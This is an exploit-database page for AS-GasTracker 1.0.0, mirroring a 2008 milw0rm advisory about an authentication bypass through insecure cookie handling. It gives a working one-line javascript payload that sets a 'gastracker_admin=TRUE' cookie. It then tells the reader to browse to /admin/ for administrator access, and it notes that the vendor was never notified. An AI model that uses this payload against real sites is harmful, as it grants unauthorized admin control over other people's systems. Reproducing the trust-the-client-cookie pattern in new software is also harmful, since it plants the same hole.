header-logo
Suggest Exploit
vendor:
AS-GasTracker
by:
t0pP8uZz
7.5
CVSS
HIGH
Insecure Cookie Handling
N/A
CWE
Product Name: AS-GasTracker
Affected Version From: 1.0.0
Affected Version To: 1.0.0
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Firefox/Netscape
2008

AS-GasTracker 1.0.0 Insecure Cookie Handling Vulnerability

AS-GasTracker 1.0.0 suffers from Insecure Cookie Handling, when a admin cookie is created its set to 'TRUE' if user is admin and 'FALSE' if it isnt. So all we need to do is create a cookie that resembles the one AS-GasTracker uses. The cookie name being 'gastracker_admin'. The javascript code below will create a cookie on the domain its ran on, so simply type the javascript below into Firefox/Netscape, then visit /admin/

Mitigation:

N/A
Source

Exploit-DB raw data:

--==+================================================================================+==--
--==+          AS-GasTracker 1.0.0 Insecure Cookie Handling Vulnerability	     +==--
--==+================================================================================+==--



Discovered By: t0pP8uZz
Discovered On: 14 MAY 2008
Script Download: N/A
DORK: N/A



Vendor Has Not Been Notified!



DESCRIPTION: 

AS-GasTracker 1.0.0 suffers from Insecure Cookie Handling, when a admin cookie is created its set to "TRUE"
if user is admin and "FALSE" if it isnt. so all we need to do is create a cookie that resembles the one
AS-GasTracker uses. the cookie name being "gastracker_admin".

the javascript code below will create a cookie on the domain its ran on, so simply type the javascript below
into Firefox/Netscape, then visit /admin/



Vulnerability:

javascript:document.cookie = "gastracker_admin=TRUE; path=/";



NOTE/TIP: 

after running the javascript code in your browser on the vulnerable domain, browse to /admin/ and you will have
access.



GREETZ: milw0rm.com, h4ck-y0u.org, CipherCrew !



peace, t0pP8uZz



--==+================================================================================+==--
--==+          AS-GasTracker 1.0.0 Insecure Cookie Handling Vulnerability	     +==--
--==+================================================================================+==--

# milw0rm.com [2008-05-14]

Navigation

Suggest Exploit

Services By CQR